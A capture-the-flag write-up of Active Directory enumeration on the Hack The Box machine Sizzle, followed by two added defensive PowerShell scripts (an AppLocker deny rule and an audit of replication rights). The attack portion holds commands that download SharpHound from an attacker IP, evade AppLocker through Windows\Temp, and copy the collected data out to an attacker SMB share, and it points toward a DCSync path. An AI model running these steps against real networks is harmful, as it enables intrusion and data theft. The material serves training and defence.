25-Bloodhound

Transferred SharpHound.exe to the target machine

PS htb\amanda@SIZZLE Documents> curl http://10.10.14.10/SharpHound.exe -OutFile sharphound.exe
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> 

Error while running the exe file

PS htb\amanda@SIZZLE Documents> .\sharphound.exe
Program 'sharphound.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\sharphound.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

AppLocker bypass
I'll copy it to a place where users can write, like Temp.
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

Successful

PS htb\amanda@SIZZLE Documents> copy sharphound.exe C:\windows\Temp
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> cd C:\windows\temp
PS htb\amanda@SIZZLE temp> ./sharphound.exe
2024-01-14T11:32:54.1055361-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-01-14T11:32:54.2774159-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.3086946-05:00|INFORMATION|Initializing SharpHound at 11:32 AM on 1/14/2024
2024-01-14T11:32:54.4805358-05:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for HTB.LOCAL : sizzle.HTB.LOCAL
2024-01-14T11:32:54.5117913-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-14T11:32:54.7774101-05:00|INFORMATION|Beginning LDAP search for HTB.LOCAL
2024-01-14T11:32:54.8242859-05:00|INFORMATION|Producer has finished, closing LDAP channel


I was not able to list files in the Temp dir ->

PS htb\amanda@SIZZLE Temp> dir
Access to the path 'C:\windows\Temp' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\windows\Temp:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
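From the defender's side, the copy to C:\Windows\Temp works because AppLocker's default Exe rules allow everything under %WINDIR%\*, and Windows\Temp is one of the subdirectories where standard users can create files (its default ACL grants Users create/write but not list, which is also why the `dir` above is denied while the earlier `copy` succeeded). The following PowerShell is an added example, not part of the writeup: it builds a deny rule for that path, evaluates it with Test-AppLockerPolicy against a test binary, and optionally merges it into the local policy. The rule name, the policy file path and the `applocker-check.exe` test file are my own choices; it assumes the AppLocker module and an elevated session.

```powershell
# Added example (not from the writeup): close the %WINDIR%\Temp gap with an
# explicit deny rule and verify it with Test-AppLockerPolicy.
# Assumptions: AppLocker PowerShell module available, elevated session.
param([switch]$Apply)

$ruleId     = [guid]::NewGuid().ToString()          # fresh Id for the new rule
$policyPath = Join-Path $env:TEMP 'deny-windows-temp.xml'   # our own file name

# Deny rule for Everyone (S-1-1-0). Deny rules take precedence over the
# default "%WINDIR%\*" allow rule, so binaries in Windows\Temp are blocked
# for every account, including administrators. EnforcementMode=NotConfigured
# keeps whatever enforcement setting the existing Exe collection already has.
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="NotConfigured">
    <FilePathRule Id="$ruleId" Name="Deny execution from Windows Temp"
                  Description="User-writable subdirectory of %WINDIR% covered by the default allow rule"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\Temp\*" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Test-AppLockerPolicy needs a real file to evaluate, so stage a known
# system binary under Windows\Temp as the candidate, then clean it up.
$candidate = Join-Path $env:WINDIR 'Temp\applocker-check.exe'   # test file, our own name
Copy-Item (Join-Path $env:WINDIR 'System32\whoami.exe') $candidate -Force
try {
    # With only the deny rule in this XML, the expected decision for the
    # candidate is "Denied" with MatchingRule = our rule name. Any path outside
    # Windows\Temp would come back "DeniedByDefault" against this file alone,
    # which is why the check is done before merging with the live policy.
    $decision = Test-AppLockerPolicy -XmlPolicy $policyPath -Path $candidate -User 'Everyone'
    $decision | Format-List FilePath, PolicyDecision, MatchingRule

    if ($decision.PolicyDecision -ne 'Denied') {
        throw "Deny rule did not match $candidate (got $($decision.PolicyDecision))"
    }
}
finally {
    Remove-Item $candidate -Force -ErrorAction SilentlyContinue
}

# Merge (not replace) so the default allow rules stay in place.
if ($Apply) {
    Set-AppLockerPolicy -XmlPolicy $policyPath -Merge
    Write-Host "Deny rule merged into local AppLocker policy."
}
```

Run it without `-Apply` first to see the decision; the linked bypass list names further user-writable directories under %WINDIR% that deserve the same treatment, and in a domain the rule belongs in the GPO that delivers the AppLocker policy rather than in the local policy.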

So I guessed the BloodHound file name.
It uses this format to name the files -> YYYYMMDDHHMMSS_BloodHound.zip

PS htb\amanda@SIZZLE Temp> copy 20240114224703_BloodHound.zip C:/users/amanda/Desktop
Enter PEM pass phrase:

PS htb\amanda@SIZZLE Desktop> dir


    Directory: C:\users\amanda\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/14/2024  10:47 PM          11560 20240114224703_BloodHound.zip


PS htb\amanda@SIZZLE Desktop>  net use S: \\10.10.14.10\s /user:ctf lover
Enter PEM pass phrase:
The command completed successfully.

copy 20240114224703_BloodHound.zip S:\

[BloodHound screenshots omitted]

Exploit
...

In short, the GetChanges principal is not bad on its own; the problem starts when we also have the GetChangesAll principal.

And we have both GetChanges and GetChangesAll.

But first I need to escalate to the mrlky user.
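The point above, that GetChanges alone is harmless and the pair is what matters, is something a defender can check directly on the domain object's ACL rather than through a BloodHound graph. The following PowerShell is an added example, not part of the writeup: it lists which principals hold each of the two replication extended rights and flags those holding both. It assumes the ActiveDirectory RSAT module and a domain-joined session; the domain is read from Get-ADDomain, so nothing from this box is hard-coded. The two rightsGuid values are the well-known schema GUIDs for the rights.

```powershell
# Added example (not from the writeup): audit the replication control access
# rights on the domain head. Assumes the ActiveDirectory module and that the
# AD: PSDrive it provides is available.
Import-Module ActiveDirectory

# Schema rightsGuid values of the two replication extended rights.
$getChanges    = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
$getChangesAll = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All

$domainDn = (Get-ADDomain).DistinguishedName
$acl      = Get-Acl -Path "AD:\$domainDn"

# Keep only Allow ACEs that grant an extended right with one of the two GUIDs.
$extended = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$replAces = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.ActiveDirectoryRights.HasFlag($extended) -and
    ([string]$_.ObjectType) -in @($getChanges, $getChangesAll)
}

# One row per principal, with a flag per right.
$report = $replAces |
    Group-Object IdentityReference |
    ForEach-Object {
        $guids = $_.Group | ForEach-Object { [string]$_.ObjectType }
        [pscustomobject]@{
            Principal     = $_.Name
            GetChanges    = $guids -contains $getChanges
            GetChangesAll = $guids -contains $getChangesAll
        }
    } | Sort-Object Principal

$report | Format-Table -AutoSize

# The combination is what should be reviewed; normally only Domain Controllers,
# Domain Admins, Enterprise Admins and the domain's own SYSTEM appear here.
$both = $report | Where-Object { $_.GetChanges -and $_.GetChangesAll }
Write-Host "Principals holding both replication rights:"
$both | Select-Object -ExpandProperty Principal
```

Two caveats when reading the output: a principal with GenericAll (or WriteDacl) on the domain object effectively has both rights without an explicit ACE, so those holders should be reviewed separately, and group membership is not expanded here, so a user reaches the list through whichever group appears in it.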